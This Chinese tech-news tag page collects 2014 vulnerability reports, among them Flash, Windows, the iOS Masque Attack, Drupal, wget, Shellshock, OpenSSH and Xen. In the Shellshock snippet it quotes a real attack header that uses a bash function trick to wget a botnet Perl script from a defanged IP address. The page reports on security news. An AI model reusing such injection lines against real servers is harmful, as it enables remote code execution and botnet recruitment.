漏洞_Tag标签_程序员俱乐部

中国优秀的程序员网站程序员频道CXYCLUB技术地图
热搜:
更多>>
 
当前位置:程序员俱乐部 >>Tag标签 >> 漏洞 >>列表
Adobe公司的FlashPlayer素来不受太多人喜欢。在他们的印象中该应用往往是消耗CPU和降低续航的代名词,包括苹果在内的诸多科技企业都纷纷将目光瞄准了HTML5标准。但不可斗否认的是目前很多网页都依然在使用基于Flash的视频内容,今天公司推出了关键安全补丁,修复了18项安全漏洞。这些漏洞允许黑客通过AdobeFlash提升安全级别,以便于获得更高的权限来访问你的系统。本次补丁同时面向Mac和Windows平台,版本号为11.2.202.418,而面向Linux平台的版本号为13.0... 查看全文
11月13日消息,据国外媒体报道,微软公司于本周二发布漏洞补丁以修复Windows操作系统中的漏洞。该漏洞存在了19年,但一直未被发现。该漏洞存在于Windows95以后每一个版本的Windows系统上,它可以允许攻击者远程接管并控制计算机。攻击者利用它甚至可以避开IE11沙箱(Sandbox)中的的增强保护模式(EPM),以及微软免费提供的反探测工具。IBM公司的网络安全研究团队五月发现了这一漏洞,称它是在操作系统中“十分显著的漏洞”。IBMX... 查看全文
安全公司FireEye在其官方博客上警告,iOS设备的一个安全漏洞允许攻击者用恶意应用替换已安装的合法应用,窃取密码电子邮件等敏感数据。FireEye将这种攻击方式称为“面具攻击”(MasqueAttack),如果合法应用和恶意应用使用相同的包标识符,攻击者可以诱骗受害者安装具有欺骗性名字的应用如新愤怒小鸟,替换已经安装的愤怒小鸟。FireEye称,此类攻击可用于盗窃银行和邮件的登陆信息或其他敏感数据。“这是个很大的漏洞,很容易被利用,&rdquo... 查看全文
11月11日,网络安全公司FireEye周一发布报告称,苹果iOS操作系统中存在的一个漏洞,能够让黑客通过攻击,控制绝大多数的iPhone和iPad,并获取到这些设备中的敏感数据。FireEye周一在官方博客上公布了有关iOS漏洞的细节信息。该公司表示,iOS操作系统中的这一漏洞,能够通过短信、电子邮件或链接,诱骗用户安装恶意应用,从而黑客控制用户的设备。随后,黑客可利用恶意应用来取代通过苹果应用商店AppStore安装的真实、可信的应用,如电子邮件和银行应用等... 查看全文
· Google发布Nogotofail检测HTTPS漏洞发布时间:2014-11-05
Google发布了一个测试网络流量安全性的工具Nogotofail,设计检测你正在使用的设备或应用程序是否能安全抵御已知的TLS/SSL漏洞,或是否存在错误配置。Nogotofail采用ApacheLicense2.0授权,项目托管在GitHub上,允许任意使用,任何人都可以贡献代码,支持Android、iOS、Linux,Windows、ChromeOS、OSX,或任何能联网的设备... 查看全文
2015年是美国银行及零售商用芯片卡替换磁条的截止日期,但英国纽卡斯尔大学的研究人员声称,所谓的更安全的芯片卡,其系统存在严重漏洞。VISA开发的在英国使用的芯片银行卡系统,不能识别外币交易,并因此会被利用进行非法转账,最多可达99.99999万的货币单位。而且,由于芯片卡不像传统的磁条卡需要接触读卡器才能完成交易,因此黑客可以携带读卡器走近受害者,即可完成非法转账行为。同时,这种卡与卡之间的转账是线下的,不通过零售商的POS机,也没有另外的安全检测手段。发现该漏洞的研究人员表示... 查看全文
开源内容管理系统Drupal发出警告,如果没有在安全修正发布7小时内打上补丁,那么使用Drupal7的网站可以假定他们已经遭到了攻击者入侵。自动攻击工具已能利用漏洞去控制网站。安全公司Sophos的分析师MarkStockley说,这一警告令人震惊。他估计全世界大约有10亿个网站,其中5.1%的网站是使用Drupal管理内容,有多达1200万个网站需要用户手动打上补丁,而大多数网站不太可能及时打上补丁。他认为Drupal不应该依靠用户去安装安全更新,而应该采用自动更新推送安全修正... 查看全文
· wget发现严重安全漏洞发布时间:2014-10-30
在Linux和Unix系统中广泛使用的开源应用wget发现了一个严重安全漏洞,允许攻击者通过FTP创建任意文件和目录,甚至复写整个文件系统。该漏洞是Rapid7的首席研究官HDMoore最早报告给GNUWget项目的。不同于此前广泛宣传的Heartbleed,ShellShock,POODLE和Sandworm漏洞,wget这个的严重漏洞没有起什么特别的绰号。利用wget漏洞的测试程序已经发布,确认wget1.14存在漏洞。... 查看全文
一名安全研究人员发现三星的“FindMyMobile”功能中存在一个漏洞,可以让黑客通过互联网干扰手机。“FindMyMobile”服务让三星用户能跟踪他们的设备,如果被偷则可以锁住或删除手机内容。然而据报道,MohamedBaset发现三星没有正确地检查“FindMyMobile”的请求来自哪里。这意味着黑客可以假冒手机所有者并干扰用户的账号。所以有了这个安全漏洞黑客能做些什么?他们可以在手机屏幕上显示一条定制化的信息... 查看全文
攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求,诱骗bash远程执行命令。安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是:Message-ID:(){:;};wget-O/tmp/.legendhxxp://190-94-251-41/legend.txt;killall-9perl... 查看全文
由于SSL3.0网络协议最近曝出严重安全漏洞,很多相关厂商都开始采取应对措施,苹果也通知开发者,其推送通知服务(APNS)将删除对SSL3.0的支持,直接在ProviderCommunication接口中将其禁用。苹果表示,推送通知今后会改用更安全的TLS安全传输层协议,开发者需要注意支持。如果你的应用在同时使用SSL3.0、TLS,将不会受到任何影响,但如果只用了SSL3.0,还请尽快升级。本月早些时候,Google的一名研究人员发现了SSL3.0中的一个安全漏洞,称之为&ldquo... 查看全文
当地时间周四,除发布OSX10.10Yosemite外,苹果还发布了其他一些软件更新,其中大部分为安全补丁。这些安全补丁针对OSXMountainLionv10.8.5、OSXMavericksv10.9.5、OSXServerversions2.2.5版本和3.3.2版本以及4.0以及iTunes12.0.1。预计苹果将在周一(10月20日)发布iOS8.1系统时一并发布这些安全补丁,而其中一些补丁将被嵌入到新发布的Yosemite系统和iOS系统当中... 查看全文
北京时间10月15日早间消息,达拉斯信息安全公司iSightPartners周二发布的一份报告显示,俄罗斯黑客利用微软Windows系统中的漏洞对欧美国家政府、北约,以及乌克兰政府展开间谍活动。报告称,俄罗斯黑客攻击的目标还包括欧洲的能源和电信行业公司,以及美国一些未披露的学术机构。目前尚不清楚黑客攻击导致了什么样的信息泄露,但iSight表示,攻击目标与俄罗斯和西方之间关于乌克兰的僵局有关。这些目标包括9月初在威尔士举行的北约峰会。俄罗斯黑客攻击了乌克兰政府,以及至少一家美国机构... 查看全文
Google工程师NeelMehta最早发现了OpenSSL的Heartbleed漏洞,他现在首次披露了发现的经过。Mehta说,他当时正逐行的检查OpenSSL的SSL堆栈,他决定检查SSL堆栈的主要原因是今年早些时候发现了多个加密漏洞,其中一个是GoToFail,另一个是GnuTLS的缓冲溢出bug。Mehta说,SSL堆栈漏洞发现的速度在加快,他很好奇SSL堆栈的安全现状,所以想去了解一下。他没有预计到主流媒体会对该bug产生如此大的热情... 查看全文
欧洲刑警组织预言,到今年年底,世界将可能发生首例利用联网设备实施的在线谋杀案。欧洲刑警组织的研究发现,政府还没有准备好应对日益上升的在线谋杀的风险——网络犯罪分子利用联网设备攻击受害者身体,对受害者造成伤害甚至死亡。联网的医疗设备如心脏起搏器,胰岛素泵和除颤器都可能存在风险。前美国总统切尼因担心黑客的远程访问而移除了除颤器的无线功能。... 查看全文
· OpenSSH SFTP远程溢出漏洞发布时间:2014-10-08
安全社区爱好者JannHorn公布了OpenSSH可以让用SFTP访问的用户在没有验证的情况下使用"ForceCommandinternal-sftp"的漏洞(含POC),也就是说如果你的OpenSSH服务器中没有配置"ChrootDirectory"的话普通用户都可以访问所有文件系统的资源,包括/proc,在>=2.6.x的Linux内核上,/proc/self/maps会显示你的内存布局,/proc/self/mem可以让你任意在当前进程上下文中读写,而综合两者特性则可以造成远程溢出... 查看全文
· Bugzilla 0day漏洞曝光0day漏洞细节发布时间:2014-10-08
广泛使用的bug跟踪系统Bugzilla发现了一个0day漏洞,允许任何人浏览未修正尚未公开的漏洞细节。Bugzilla由Mozilla开发,被开源项目广泛使用,任何人都可以在Bugzilla平台创建帐户报告某个项目的bug。安全公司CheckPointSoftwareTechnologies的研究人员发现,Bugzilla的查询权限分配漏洞允许任何人使用能绕过验证的任意电子邮件注册,获得某个Bugzilla平台的管理权限。举例来说,使用admin@mozilla... 查看全文
距离“破壳”(Shellshock)漏洞的首次爆发已经快两周时间了。相信你很可能听说过这个漏洞,它的危害等级被专业安全人士评为10。相比之下,上一个著名漏洞“心脏出血”只有5。不过奇怪的是,“破壳”目前的反响并不高。“心脏出血”爆发时,腾讯、阿里、华为、小米等大厂以及许多安全厂商都被爆出漏洞,讨论人群也非常广泛,有许多的非专业用户都参与其中。但“破壳”爆发后... 查看全文
· Xen漏洞曝光发布时间:2014-10-04
Xen是大规模部署的虚拟化方案之一,这一轮的*EMBARGO*一共曝光了5个漏洞,其中最后一个已经于北京时间2014年10月1日晚上披露,这个编号CVE2014-7188的漏洞是由SUSELinux的工程师JanBeulich发现的,Xen和KVM的实现略有不同,在x86架构上,其hypervisor是运行于RING-0的,而传统的linux内核host运行于RING-1,通常的系统调用是直接CALL到RING-1,只有hypercall才是CALL到RING-0... 查看全文
日前,苹果发布了针对Mac电脑的Bash漏洞“Shellshock”安全补丁。上周,安全专家警告称,他们在广泛使用的Linux及MacOSX系统上的Bash软件中新发现了一个安全漏洞。该漏洞对电脑用户构成的威胁可能比今年4月发现的“心脏流血”(Heartbleed)漏洞更大。苹果此前表示,绝大多数Mac电脑用户不会因为近期确认的Bash软件漏洞“Shellshock”而处于风险中。但苹果后来改口称... 查看全文